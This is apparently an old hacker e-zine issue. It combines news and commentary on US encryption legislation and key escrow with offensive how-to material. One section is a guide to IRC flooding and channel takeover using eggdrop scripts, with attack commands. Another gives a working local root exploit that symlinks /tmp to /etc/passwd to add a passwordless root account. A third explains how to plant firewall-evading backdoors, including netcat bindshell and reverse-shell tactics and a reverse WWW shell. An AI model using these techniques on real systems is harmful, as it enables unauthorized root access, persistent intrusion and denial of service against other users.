In the latest bill, the administration proposes that law enforcement agents have
access - under limited circumstances - to decryption keys held by recovery
agents, which are third-party warehouses of decryption keys that "unlock"
complex codes that mask the readable form of the data. The proposed law
also allows the government to obtain search warrants to find decryption keys
if they are not held by recovery agents.
The proposed bill would provide new protections for lawful users of
encryption. Currently, according to a summary of the bill that is part of a
proposed letter to House Speaker Dennis Hastert (R-Ill.), there are few laws
guiding how recovery agents treat the decryption keys they store. The bill
would prohibit recovery agents from disclosing the keys or from using the
keys to decrypt data except under certain circumstances, such as when a
lawful heir of a deceased person wants decryption keys to the deceased's
locked information.
The draft bill also prohibits recovery agents from selling or revealing in any
way their customer lists to other parties.
The new protections, however, are not strong enough to avoid the erosion of
privacy rights, said David Sobel, general counsel for the Electronic Privacy
Information Center, an advocacy group based in Washington, D.C. "It is not a
pro-encryption proposal," he said. "The bottom line is: This is legislation that
would increase law enforcement's ability to access encrypted data."
It also would serve to lay the legal groundwork for eventually outlawing
encryption that does not have decryption keys available to law enforcement,
Sobel said. "They could say, 'We have established legal procedures in place,
they have been used in several cases. Now our problem is not everybody is
using encryption that provides us with...access,' " he said.
Barbara Simons, president of the California-based Association for Computing
Machinery, said the proposed bill bodes poorly for citizens' privacy. "Our
lives are moving more and more online," she said. "There's always the risk that
some future government or administration might compromise the rights and
freedoms we enjoy today and take advantage of this technology."
The proposed bill was not a surprise, she said, because FBI Director Louis
Freeh "has been pushing to have access keys for a long time."
Fred Smith, an attorney in Santa Fe, N.M., who works as a special
prosecutor in computer cases, said he does not believe the administration's
motives are nefarious.
"I really believe that there's a serious and good faith concern about what we're
going to do if encryption takes off the way it appears to be taking off at the
moment," he said.
A spokesman for DOJ described the proposal as "pending" and declined to
comment on it.
One Capitol Hill staffer had some concerns. "I think they are really trying to
hobble how people use encryption," said Ellen Stroud, spokeswoman for
Rep. Bob Goodlatte (R-Va.), sponsor of the Security and Freedom through
Encryption Act, which would relax controls on the export of encryption and
prohibit the government from requiring a backdoor into people's e-mail and
computer files.
Stroud said law enforcement officials examining electronic files as they pursue
criminals in cyberspace could accidentally modify or destroy a company's
legitimate files. "[The proposal] doesn't provide the needed protection for
companies using encryption," she said. "You're putting yourself at greater
liability [if you use a third-party firm to keep encryption keys.] It's easier for
somebody to search you."
Stroud also said owners of information searched during a criminal investigation
will not necessarily know what information law enforcement officials have
been examining because the draft bill would allow law enforcement officials in
some cases to delay issuing notice of the search warrant.
"If you want information from me, come to me and get it," Stroud said. "Why
go to somewhere else? Why go to my neighbor? If you have a problem, hit it
straight on."
@HWA
04.0 The lost art of IRC warfare using eggdrop bots
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I found this while looking for a country script for a certain bot on a certain
channel and found it pretty informative...so its here for you to peruse and
perhaps learn a thing or two from the 'other' side of IRC. - Ed
IRC WAR
~~~~~~~~
Fighting with, and against, the Eggdrop Bot!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Stormking
The properly configured Eggdrop bot is one of the most powerful IRC war machines, able to flood,
icmp, nuke, and easily takeover channels. It is also damn near impossible to kill! On this page
I will try to teach you a few of the tricks of configuring and using the Eggdrop Warbot.
By itself Eggdrop is little more than a tough irc client. The heart of the warbot is in the various
tcl scripts designed to wreak havoc on IRC! I'll tell you what they are, where to get them, and how to
set them up for maximum damage. First, lets make sure yer bot's protection is set up properly.
Eggdrop flood protection is set in the config file, way down in the "###MORE ADVANCED STUFF###" section.
Heres an example from a 1.1.4 bot:
# how many msgs in how many seconds from the same host constitutes a flood? set flood-msg 5:60
# how many public msgs in how many seconds? set flood-chan 10:60
# how many joins/nick changes in how many seconds? set flood-join 5:60
# how many CTCPs in how many seconds? set flood-ctcp 3:60
You can change these to yer liking but I find that the defaults work just fine in most cases. Some bot
masters run an extra tcl for protection such as ctcpprot but I've rarely had a bot flud off with the
defaults. If you feel you need extra protection, its there.
Fighting With Eggdrop
So you got a new bot and you want to be a badass? Well, its easy enough to do. After you have yer bot's
protection squared away, you'll need a few tcl scripts to help you on yer way. I don't have the server
space to offer all the available war tcls but you can get most any of them at ftp://ftp.sodre.net/pub/eggdrop/
in the appropriate scripts section for yer bot version. Here's a list of some of my favorites:
- icmp tcl Fabulous, if yer shell supports ping
- Chantoolz Has its own floods too. For 1.0x
- takeover.tcl Self explanatory. For 1.0x
- massmode1.1a.tcl 1.1x takeover script
- mjoin.tcl A mass join script for botnets
- flud501e.tcl 1.0x fludnet scripts. Rox their asses!
- flud501f-oc.tcl 501e modified for 1.1x bots
- Wardrop.tcl Most everything combined into one script!
There are also a few advanced Unix war programs like "botnuke", "ssping", and "pepsi" but they require root
access so almost noone can use them. If you have root access, you likely don't need me to tell you how to play
war on Unix! The same goes for the fabled "spoofers", if you have them, you know how to use them.
OK, now that we have them, how do we use them? Well, most have their own help files. Use them. Anytime you are
planning on loading a script you should always open it in an editor to see if there is anything you need to set
before loading it. Now's a good time to look the script over for the basic commands, and the help
commands! For example, the help file in takeover.tcl is accessed with the command ".thelp". This is a typical usage.
Sometimes there are settings for which user flag will be required to use the tcl. Most default to +m but you can
change that. My recommendation is to leave it as +m or even +n. Don't let all yer users access your bot's war stuff
unless you want problems with opers.
Let's talk a little about icmp.tcl. This script rox, if you can use it. Unfortunately most shells don't allow ping
or allow only very limited pinging. Its easy to find out if you got lucky.... Just load the script, no editing needed
for the test. In dcc type ".set icmp 1". Now get someone's dns addy (the numeric one, do "/dns nick" in mIRC) and
type ".icmp addy", putting the dns addy instead of the word "addy" of course.... Your bot will do one of several
things. Most likely it will say "Sorry, this shell does not support ping". If it does, yer s.o.l., unload the script.
It might, however, say "now icmp flooding". If it floods, watch yer victim (or use yer own dns for the test) and see if
he poofs. If he drops off within a few minutes you are one of the lucky ones! If not, your ping is limited to a useless
level. The help file for icmp.tcl is "icmp".
Another kewl script is mjoin.tcl. Its a botnet mass join/part script. Its usage is real simple, just load it and type
".mjoin #channel". Every bot on yer net which is running this script will join that channel. Use ".mpart #channel" to
get them out. This script can be loads of fun but use it carefully as some people don't care for their bots being
jerked into strange channels. Those people, of course, shouldn't run this tcl but some do......
The king of the Eggdrop war scripts is flud.tcl, available in various versions. The ones I prefer are available above.
Use 501e for 1.0x bots and 501f for 1.1x. 501e comes complete with 2 versions, a standard -oc version and a +oc version.
The +oc (stands for oper-check) will check the victim before fludding and abort fluds on opers, a damn good idea!
There is a bit more to this tcl, both in setup and use, than most of the others. To get started open the tcl in any
editor EXCEPT PICO (pico doesn't like long lines). You will see these settings at the top:
# set flag1 "e" ;# Flag suggested for fludflag.
set fludword "flud" ;# Word to use for fluding
set fludflag "m" ;# Flag required for fluding.
set fludver "501-e" ;# Flud Version. DON'T Change(I'll kill you if you do)!
set fludmax 10 ;# Max times to flud.
set fluddef 5 ;# Default flud times.
set fludnap45 ;# Leave this at 45 to keep the net in synch!
set fludnet "EFnet" ;# Net you are on.
set fludact 1 ;# Flud on or off? (0/1)
set ircnick "" ;# Define your IRC nickname here. EXTREME PROTECTION!
set fludnick 0 ;# Change to 1 to Enable Nick Changes during fludz.
The first one, #set flag1 "e", you have to uncomment if you want to use it. It gives users a seperate flag if they are
allowed to flud. I never use this, I just leave the fludflag at "m", allowing any master to flud. The only settings you
might need to change here are the fludnet, ircnick, and fludnick.
Fludnet, obviously, should be set to the network yer bot is on. Ircnick allows 1.0x bots to have a different nick on the
botnet and on irc, a good idea in my opinion. 1.1x allows you to set "botnet nick" in the config file so its not needed here.
Fludnick is an interesting feature, very useful but somewhat annoying. It changes yer bot's nick during fluds to a random
nick, such as SJYT233, then changes it back again after the flud. This can save you from k-lines when the victim sends his log
to an oper but can be a bitch in a busy channel. I always set fludnick 1. All my bots flud and I have very few k-lines. Its up
to you!
OK, once you have these things set its time to learn how to use flud. The help file for flud.tcl is ".fludhelp". You will need
it. There are many types of fluds available, each useful in certain situations.
The basic syntax for fluds is ".flud/ nick /# of times/ type of flud". In other words, ".flud butthead 10 15" would flud
butthead 10 times with a type 15 flud, a "Boom" echo flud. Always use 10 for the number of lines as most fludbots are set for a
maximum of 10. If my victim is a standard mIRC client I like to start with the Boom flud. If there are above 30 fludbots available
he will usually drop. If he doesn't drop, he may be running an advanced mIRC script and be basically un-fludable. Against bots I
use a "4" or clientinfo flud. Sometimes it works. Another kewl flud is the "22" or privmsg flud. This one opens a bunch of little
chat windows on yer victims screen. Not very effective but annoying as hell! Experiment, find yer own favorites.
A few other useful commands are ".fludbots", which tells you how many bots will flud, and ".last" which tells who made the last
flud. Set yer console to +5 to see flud results and progress. Always remember the main rule of fludding, do a /whois on yer victim
before fludding. DO NOT EVER flud irc operators. To do so risks not only yer own bots but all fludbots on the net. Most botnets
will kick you off for fludding an oper. Remember this. You have been warned.
Fighting Against Eggdrop
Since Eggdrops are UNIX processes they are invincible to standard nuking and such things as will easily kill a Windoze client. A
strong icmp, such as from a T3, will kill a bot but thats about it. This assumes, of course, that yer bot is on a solid shell
(Win-Eggs are NOT included). I've also had limited success with an old DOS based proggie called Flash. Most Eggdrops don't blink at
this but a few will drop. Its worth a try if you need to kill an Eggdrop.
If you have a good fludnet behind you (say 50 or more fludbots) you can sometimes drop an Egg with a standard flud. I find that
clientinfo fluds (usually flud type 4) work best against Eggdrops. Again, most won't blink but a few will fall. You can also try a
good nuker set for non-standard protocols like "host unreachable". If these things don't work yer likely stuck with waiting and
hoping the bot's shell goes down so you can jump in the channel and quickly kill the other users, grabbing ops before the bot returns.
In Conclusion
Many people nowadays say things like "IRC war is lame" or "the days of IRC war are over". Well, lame it may be, but dead it certainly
isn't. I am a firm believer in peace on Earth, and on IRC, but I also believe that peace is best maintained, in both cases, through
superior firepower.
@HWA
05.0 Finally a working redhat 5.2 local exploit - From BlackBox issue #1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by icesk
HAPPY_FILE="/etc/passwd"
MAGIC_FILE="/tmp/.font-unix"
MAGIC_USER="1C3SK"
LOGIN=`which login`
ln -s $HAPPY_FILE $MAGIC_FILE
echo "made symlink;" `ls -l $MAGIC_FILE`
while (HAPPY_FILE=HAPPY_FILE); do
sleep 2;
if [ -w $HAPPY_FILE ]; then
echo $MAGIC_USER"::0:0::/:/bin/sh:"
echo $MAGIC_USER"::0:0::/:/bin/sh:" >> /etc/passwd
$LOGIN $MAGIC_USER
exit
fi; done
fi
done
@HWA
06.0 The state of crypto today
~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.hackernews.com/
contributed by Brian Oblivion
Cyberspace Electronic Security Act, CALEA, OECD, The
Wassenaar Arrangement, SAFE, HR-2616, S798,
HR-2617, UCITA, and on and on and on. Just what the
hell is going on? The government wants crypto controls
and the public doesn't.
Buffer Overflow
http://www.hackernews.com/orig/buffero.html
The State of Crypto Policy Today: If you have
nothing to hide...
By: Brian Oblivion
L0pht Heavy Industries
The World remains forever changed by the promise of
international telecommunications. For the past 3 decades
we have enjoyed an ever growing communications
explosion providing a mechanism for the free flow of
information internationally. With early communications
systems, Governments could easily setup listening posts
on international links before exiting the country via
undersea cable or satellite uplinks. Prior to the mid-1980's
the resources to protect communications via cryptography
were cost prohibitive and physically constraining.
Privacy is power, therefore it must be regulated.
Today, the proliferation of high-performance, low-power,
low-cost micro-processors have opened the door to build
cryptographic protection into all communication systems.
This would render existing governmental listening outposts
obsolete. We know this is true, due to the scrambling at
hand on curtailing the proliferation of strong encryption
systems and software. The intelligence communities have
noticed a sharp increase in encrypted traffic across the
communications networks of the world. This originally
prompted the US (United States) to advertise the use of
Key Escrow/Recovery encryption, where the keys used to
protect information would be stored by a trusted third
party. Later, a key could "lawfully" be obtained to decrypt
stored files or communications in real-time once protected
by that key.
International and domestic opposition to Key
escrow/recovery systems has seemed to triumph in
Europe and most of the world. The OECD (Organization for
Economic Cooperation
and Development), a Paris-based
international body of 29 countries, resisted lobbying by
the US Department of Justice, FBI and NSA to endorse
key escrow/recovery systems. The European Union is a
staunch opponent to Key Escrow regimes and is presently
removing inter-union restrictions on encryption products,
leading the way for other countries to adopt privacy
focused strategies.
In addition to OECD, The Wassenaar Arrangement, a 32
country body, sets export controls for conventional
weapons and sensitive dual-use goods and technologies.
The US successfully lobbies this organization, and uses it
to assert its crypto policy on an international scale. The
bulk of the restrictions on dual-use goods and
technologies are uncannily similar to those which are
promulgated by the United States. Recently the
Arrangement increased export restrictions on encryption
products with 64-bit or greater key sizes. In light of this
new restriction, many countries have voiced their
opposition to this change in policy and plan on not
adopting the new restriction.
While no country is bound by any of these agreements,
they are encouraged to adopt the guidelines set forth by
these bodies. When countries fail to adequately interpret
the guidelines to be in line with US interpretation,
diplomatic consultation results. Recently Janet Reno, US
Attorney General, wrote the chancellor of Germany's
Federal Secretary of Justice to restrict the distribution of
"public domain" encryption products. It can be surmised
that the position of the US is to petition others to remove
all public domain encryption software from distribution
servers currently on the Internet.
As a direct result of this international collaboration of
encryption policy, the US has recently published its policy
on encryption usage, as House Resolution HR-2616. The
policy is mostly well founded, and while still not relaxing
encryption export controls on encryption bit lengths over
64-bit, it still allows US Citizens to use any encryption
they should choose without mandating key escrow
mechanisms.
" ...it shall be lawful for any person within any State and
for any United States person to use any encryption
product, regardless of encryption algorithm selected,
encryption bit length chosen, or implementation technique
or medium used."
Hopefully the public at large will act responsibly with
encryption technology. As with the current view of
firearms, this freedom is likely to be short lived.
Nowhere in the document does it discuss the ramifications
of keeping keys in tamper-responsive hardware. Nor does
it discuss the ramifications of reverse-engineering
cryptographic implementations. It can be read that as
long as you do not decrypt someone's communications or
medium without their consent you are exempt from the
laws referenced therein. There is also exclusion for
encryption products and services which are used solely for
access control, digital signatures, authentication or similar
purposes. This does allow the decryption of passwords,
and the like for security auditing and other such practices.
However, Government encryption use is called to use
escrowed cryptography, as well as are government
contractors engaged in contract work for the government.
This is actually more of a blessing than an impediment,
where the government at least will have to continue to
operate responsibly.
The provision still exists where all investigations thwarted
by the use of encryption will be recorded by the Attorney
General, and maintained in classified form. The results of
these findings will undoubtedly sway future addendums to
the current policy toward encryption.
The Security and Freedom through Encryption Act (SAFE),
once a very liberating legislative initiative, has since come
under attack by law enforcement and the intelligence
community. The original goal of SAFE was to relax all
exportation restrictions regardless of encryption key
length. However, the restrictions are now back in the Act,
with exceptions for key lengths of 64 bits or less. All other
encryption software must first be subject to governmental
review before permission can be granted for export.
The export restriction on key length is to be set by a
newly formed Encryption Export Advisory board, which
shall be comprised of a chairman under the Secretary of
Commerce for Export Administration. Seven other
individuals appointed by the President representative of
the NSA, CIA, the Office of the President, and four from
the private sector who have expertise in the information
security field. The board is to report to the president
every 30 days on what encryption technology is suitable
for export. The president can still override any
recommendation they may come up with.
The SAFE act continues prohibition on Federal or State
governmental mandated key escrow systems. A provision
stating that encrypted communications alone is not
"probable cause" to obtain a search warrant to request
the cleartext of said communications is a big win for
privacy advocates. It blocks a blanket probable cause to
eavesdrom on all communications, once the majority of
traffic is encrypted.
There are some extra penalties for using encryption to
hide "criminal" activity. One can realize that this may
become immaterial once it becomes the exception to not
encrypt your communications channels or your storage
mediums. Especially as the trend for hidden and low level
crypto systems is on the rise.
Another disturbing attribute is the mandatory, one-time
15-day technical review of your algorithms/equipment with
the Secretary of Commerce. There are some specific
restrictions for equipment which can be used for military
or intelligence end use, or which may be used for terrorist
organizations. It would seem that the definition of what
can be construed as such equipment can be quite broad
and applied to almost all encryption technologies.
As with the US Crypto Policy house resolution, a
committee to research buggered prosecutions due to the
employment of encryption technologies, is to be
established. The database will be 'classified', and
accessible by appropriate law enforcement agencies. The
results of this investigation will undoubted be used as a
case to repeal the prohibition of mandated key escrow
systems or a change in export policies.
This bill has been introduced into the senate as the
PROTECT Act of 1999, S798 IS.
Money is power, therefore we are Taxed.
HR 2617, "To amend the Internal Revenue Code of 1986 to
allow a tax credit for development costs of encryption
products with plaintext capability without the user's
knowledge."
There is a move in Congress (HR 2617) to alter the
existing tax law to allow corporations which develop and
implement encryption technologies a tax deduction. This
tax deduction is not a reward for a high level of security,
but rather, if the system has the capability of escrowing
keys used in the system. In order for this strategy to
work, taxes would continue to rise, thereby aiding those
who conform to . The legitimate basis for this Resolution
may be to stimulate development to support the US
Governments own request for Key escrowed/recovery
systems for its use.
Privacy is privilege, therefore communications are
supervised.
To further understand the commitment the US
Government has on domestic intelligence dominance, the
Communications Assistance for Law Enforcement ACT
(CALEA), which will provide law enforcement agencies
cleartext or clearvoice in near real-time without the
endusers knowledge, is clearing hurdle after hurdle. CALEA
was once opposed by the telecommunications industry,
but now that the Federal Government has removed the
monetary burden, from industry to the government, almost
all dissension has been quelled.
Performing such a wiretap is permitted only by a court
order. But with all new technology, remote capabilities and
ease of use will undoubtedly provide some risk
unauthorized monitoring of otherwise private
communications. Another possibility is during emergency
war powers or some other crisis, the inconvenience of
obtaining a court order to perform a wiretap could be
waived by a predatorial government, resulting in broad,
undetectable eavesdropping capabilities. To thwart such
activity, personal encryption technology will still be
required to circumvent the buggered, state sponsored
systems.
Knowledge is power, therefore it must be controlled.
In the US, The National Conference of Commissioners for
Uniform State Laws (NCCUSL) has approved and adopted
the Uniform Computer Information Transactions Act
(UCITA). While this document has been criticized publicly
by Attorney Generals from various states, some of the
flaws are detrimental to security applications and condone
poor programming practices.
Even after cryptographic algorithms are verified to be
relatively secure at a certain point in time, the
implementation of the overall system utilizing the algorithm
can be flawed. One must push software's bounds of
normal operations to flesh out any potentially revealing
error conditions. Using software outside of it's intended
use is considered a breach of contract, and prohibited by
the UCITA.
There are also stipulations for publicly posting criticizing
statements against faulty software. As security groups
have proven, many times security holes are only
addressed once widebanded to a software company's
peers and customers. Cryptographic implementations must
be allowed public scrutiny and analysis by ones peers. An
implementation steeped in secrecy is usually flawed and
obfuscated to prevent the revelation of such flaws.
Removing the service of independent analysis will degrade
the overall state of security in the industry, leaving the
holes in the hands of manditory federal reviewers.
As we move into the next millennium the topic of
encryption will continue to strike up heated debate
between Intelligence Communities and liberty advocates.
The world is mostly comfortable to give up its privacy for
a little security. This is usually done in comfortable
political climates. Should that climate ever change, we will
have given Government the keys to our lives, and the
ability to keep its interests above and beyond the will its
subjects. The cryptographic debate boils down to: the
ability to communicate without the fear of government
intrusion, or the possibility for all of your communications
to be intercepted by an uninvited third party. If you have
nothing to hide...
OCED Cryptography Policy
http://www.oecd.org/dsti/sti/it/secur/prod/e-crypto.htm
Cryptography and Liberty 1999
http://www2.epic.org/reports/crypto1999.html
UCITA
http://www.law.upenn.edu/bll/ulc/ucita/citam99.htm
EPIC Cryptographic Policy Review
http://www.epic.org/crypto
@HWA
07.0 Using a backdoor in a firewalled system
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[ http://www.rootshell.com/ ]
-------------------------[ Placing Backdoors Through Firewalls
--------[ van Hauser / THC <vh@reptile.rug.ac.be>
----[ Introduction
This article describes possible backdoors through different firewall
architectures. However, the material can also be applied to other
environments to describe how hackers (you?) cover their access to a system.
Hackers often want to retain access to systems they have penetrated
even in the face of obstacles such as new firewalls and patched
vulnerabilities. To accomplish this the attackers must install a
backdoor which a) does it's job and b) is not easily detectable. The
kind of backdoor needed depends on the firewall architecture used.
As a gimmick and proof-of-concept, a nice backdoor for any kind of
intrusion is included, so have fun.
----[ Firewall Architectures
There are two basic firewall architectures and each has an enhanced version.
Packet Filters:
This is a host or router which checks each packet against an
allow/deny ruletable before routing it through the correct
interface. There are very simple ones which can only filter
from the origin host, destination host and destination port, as
well as good ones which can also decide based on incoming interface,
source port, day/time and some tcp or ip flags.
This could be a simple router, f.e. any Cisco, or a Linux
machine with firewalling activated (ipfwadm).
Stateful Filters: This is the enhanced version of a packet filter. It
still does the same checking against a rule table and only
routes if permitted, but it also keeps track of the state
information such as TCP sequence numbers. Some pay attention
to application protocols which allows tricks such as only
opening ports to the interiour network for ftp-data channels
which were specified in a permitted ftp session. These
filters can (more or less) get UDP packets (f.e. for DNS and
RPC) securely through the firewall. (Thats because UDP is a
stateless protocol. And it's more difficult for RPC services.)
This could be a great OpenBSD machine with the ip-filter software,
a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1.
Proxies / Circuit Level Gateways: A proxy as a firewall host is simply
any server which has no routing activated and instead has
proxy software installed. Examples of proxy servers which may
be used are squid for WWW, a sendmail relay configuration
and/or just a sockd.
Application Gateways:
This is the enhanced version of a proxy. Like a proxy, for every
application which should get through the firewall a software must
be installed and running to proxy it. However, the application
gateway is smart and checks every request and answer, f.e. that
an outgoing ftp only may download data but not upload any, and that
the data has got no virus, no buffer overflows are generated in
answers etc. One can argue that squid is an application
gateway, because it does many sanity checks and let you filter
stuff but it was not programmed for the installation in a secure
environment and still has/had security bugs.
A good example for a freeware kit for this kind is the TIS firewall
toolkit (fwtk).
Most firewalls that vendors sell on the market are hybrid firwalls,
which means they've got more than just one type implemented; for
example the IBM Firewall is a simple packet filter with socks and a
few proxies. I won't discuss which firewall product is the best,
because this is not a how-to-by-a-firewall paper, but I will say this:
application gateways are by far the most secure firewalls,
although money, speed, special protocols, open network policies,
stupidity, marketing hype and bad management might rule them out.
----[ Getting in
Before we talk about what backdoors are the best for which firewall
architecture we should shed a light on how to get through a firewall
the first time. Note that getting through a firewall is not a plug-n-play
thing for script-kiddies, this has to be carefully planned and done.
The four main possibilities:
Insider:
There's someone inside the company (you, girlfriend, chummer)
who installs the backdoor. This is the easiest way of course.
Vulnerable Services:
Nearly all networks offer some kind of services,
such as incoming email, WWW, or DNS. These may be on the
firewall host itself, a host in the DMZ (here: the zone in front
of the firewall, often not protected by a firewall) or on an internal
machine. If an attacker can find a hole in one of those services,
he's got good chances to get in. You'd laugh if you saw how many
"firewalls" run sendmail for mail relaying ...
Vulnerable External Server:
People behind a firewall sometimes work on
external machines. If an attacker can hack these, he can
cause serious mischief such as the many X attacks if the
victim uses it via an X-relay or sshd. The attacker could
also
send fake ftp answers
to overflow a buffer in the ftp client software, replace a gif
picture on a web server with one which crashs netscape and
executes a command (I never checked if this actually works, it
crashs, yeah, but I didn't look through this if this is really
an exploitable overflow). There are many possibilities with
this but it needs some knowledge about the company. However,
an external web server of the company is usually a good start.
Some firewalls are configured to allow incoming telnet from
some machines, so anyone can sniff these and get it. This is
particulary true for the US, where academic environments and
industry/military work close together.
Hijacking Connections:
Many companies think that if they allow incoming telnet with
some kind of secure authentication like SecureID (secure algo?, he)
they are safe. Anyone can hijack these after the authentication and
get in ... Another way of using hijacked connections is to modify
replies in the protocol implementation to generate a buffer
overflow (f.e. with X).
Trojans:
Many things can be done with a trojan horse.
This could be a gzip file which generates a buffer overflow
(well, needs an old gzip to be installed), a tar file which
tampers f.e. ~/.logout to execute something, or an executable
or source code which was modified to get the hacker in somehow.
To get someone running this, mail spoofing could be used or
replacing originals on an external server which internal employees
access to update their software regulary (ftp xfer files and www
logs can be checked to get to know which files these are).
----[ Placing the Backdoors
An intelligent hacker will not try to put the backdoors on machines in
the firewall segment, because these machines are usually monitored and
checked regulary. It's the internal machines which are usually unprotected
and without much administration and security checks.
I will now talk about some ideas of backdoors which could be implemented.
Note that programs which will/would run on an stateful filter will of course
work with a normal packet filter too, same for the proxy. Ideas for an
application gateway backdoor will work for any architecture.
Some of them are "active" and others "passive". "Active" backdoors are those
which can be used by a hacker anytime he wishes, a "passive" one triggers
itself by time/event so an attacker has to wait for this to happen.
Packet Filters:
It's hard to find a backdoor which gets through this one but does
not work for any other. The few ones which comes into my mind
is a) the ack-telnet. It works like a normal telnet/telnetd except
it does not work with the normal tcp handshake/protocol but uses
TCP ACK packets only. Because they look like they belong to an
already established (and allowed) connection, they are permitted.
This can be easily coded with the spoofit.h of Coder's Spoofit
project (http://reptile.rug.ac.be/~coder).
b) Loki from Phrack 49/51 could be used too to establish a tunnel
with icmp echo/reply packets. But some coding would be needed to
to be done.
c) daemonshell-udp is a backdoor shell via UDP
(http://r3wt.base.org look for thc-uht1.tgz)
d) Last but not least, most "firewall systems" with only a screening
router/firewall let any incoming tcp connection from the source port
20 to a highport (>1023) through to allow the (non-passive) ftp
protocol to work. "netcat -p 20 target port-of-bindshell" is the
fastest solution for this one.
Stateful Filters:
Here a hacker must use programs which initiates the connection from
the secure network to his external 0wned server.
There are many out there which could be used:
active: tunnel from Phrack 52.
ssh with the -R option (much better than tunnel ... it's
a legtimitate program on a computer and it encrypts the
datastream).
passive: netcat compiled with the execute option and run with a
time option to connect to the hacker machine (ftp.avian.org).
reverse_shell from the thc-uht1.tgz package does the same.
Proxies / Circuit Level Gateways:
If socks is used on the firewall, someone can use all those stuff
for the stateful filter and "socksify" them. (www.socks.nec.com)
For more advanced tools you'd should take a look at the application
gateway section.
Application Gateways:
Now we get down to the interesting stuff. These beasts can be
intelligent so some brain is needed.
active: (re-)placing a cgi-script on the webserver of the company,
which allows remote access. This is unlikely because it's
rare that the webserver is in the network, not monitored/
checked/audited and accessible from the internet. I hope
nobody needs an example on such a thing ;-)
(re-placing) a service/binary on the firewall. This is
dangerous because those are audited regulary and sometimes
even sniffed on permanent ...
Loading a loadable module into the firewall kernel wich
hides itself and gives access to it's master. The best
solution for an active backdoor but still dangerous.
passive: E@mail - an email account/mailer/reader is configured in a
way to extract hidden commands in an email (X-Headers with
weird stuff) and send them back with output if wanted/needed.
WWW - this is hard stuff. A daemon on an internal machine
does http requests to the internet, but the requests are
in real the answers of commands which were issued by a
rogue www server in a http reply. This nice and easy beast
is presented below (->Backdoor Example: The Reverse WWW Shell)
DNS - same concept as above but with dns queries and
replies. Disadvantage is that it can not carry much data.
(http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this
example needs still much coding to be any effective)
----[ Backdoor Example: The Reverse WWW Shell
This backdoor should work through any firewall which has got the security
policy to allow users to surf the WWW (World Wide Waste) for information
for the sake and profit of the company.
For a better understanding take a look at the following picture and try
to remember it onwards in the text:
+--------+ +------------+ +-------------+
|internal|--------------------| FIREWALL |--------------|server owned |
| host | internal network +------------+ internet |by the hacker|
+--------+ +-------------+
SLAVE MASTER
Well, a program is run on the internal host, which spawns a child every day
at a special time. For the firewall, this child acts like a user, using his
netscape client to surf on the internet. In reality, this child executes
a local shell and connects to the www server owned by the hacker on the
internet via a legitimate looking http request and sends it ready signal.
The legitimate looking answer of the www server owned by the hacker are
in reality the commands the child will execute on it's machine it the
local shell. All traffic will be converted (I'll not call this "encrypted",
I'm not Micro$oft) in a Base64 like structure and given as a value for
a cgi-string to prevent caching.
Example of a connection:
Slave
GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krjVAEfg HTTP/1.0
Master replies with
g5mAlfbknz
The GET of the internal host (SLAVE) is just the command prompt of the
shell, the answer is an encoded "ls" command from the hacker on the
external server (MASTER).
Some gimmicks:
The SLAVE tries to connect daily at a specified time to the MASTER if
wanted; the child is spawned because if the shell hangs for whatever
reason you can check & fix the next day; if an administrator sees connects
to the hacker's server and connects to it himself he will just see a
broken webserver because there's a Token (Password) in the encoded
cgi GET request; WWW Proxies (f.e. squid) are supported; program masks
it's name in the process listing ...
Best of all: master & slave program are just one 260-lines perl file ...
Usage is simple: edit rwwwshell.pl for the correct values,
execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl"
on the MASTER just before it's time that the slave tries to connect.
Well, why coding it in perl? a) it was very fast to code, b) it's highly
portable and c) I like it.
If you want to use it on a system which hasn't got perl installed, search
for a similar machine with perl install, get the a3 compiler from the perl
CPAN archives and compile it to a binary. Transfer this to your target
machine and run that one.
The code for this nice and easy tool is appended in the section THE CODE
after my last words. If you've got updates/ideas/critics for it drop me an
email. If you think this text or program is lame, write me at root@localhost.
Check out http://r3wt.base.org for updates.
----[ Security
Now it's an interesting question how to secure a firewall to deny/detect
this. It should be clear that you need a tight application gateway firewall
with a strict policy. email should be put on a centralized mail server,
and DNS resolving only done on the WWW/FTP proxies and access to WWW only
prior proxy authentication. However, this is not enough. An attacker can
tamper the mailreader to execute the commands extracted from the crypted
X-Headers or implement the http authentication into the reverse www-shell
(it's simple). Also checking the DNS and WWW logs/caches regulary with good
tools can be defeated by switching the external servers every 3-20 calls
or use aliases.
A secure solution would be to set up a second network which is
connected to the internet, and the real one kept seperated - but tell
this the employees ...
A good firewall is a big improvement, and also an Intrusion Detection
Systems can help. But nothing can stop a dedicated attacker.
----[ Last Words
Have fun hacking/securing the systems ...
Greets to all guys who like + know me ;-) and especially to those good
chummers I've got, you know who you are.
Ciao...
van Hauser / [THC] - The Hacker's Choice
For further interesting discussions you can email me at vh@reptile.rug.be
with my public pgp key below :
Type Bits/KeyID Date User ID
pub 2048/CDD6A571 1998/04/27 van Hauser / THC <vh@reptile.rug.ac.be>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU
SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L
XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC
meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc
QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq
s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU
SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD
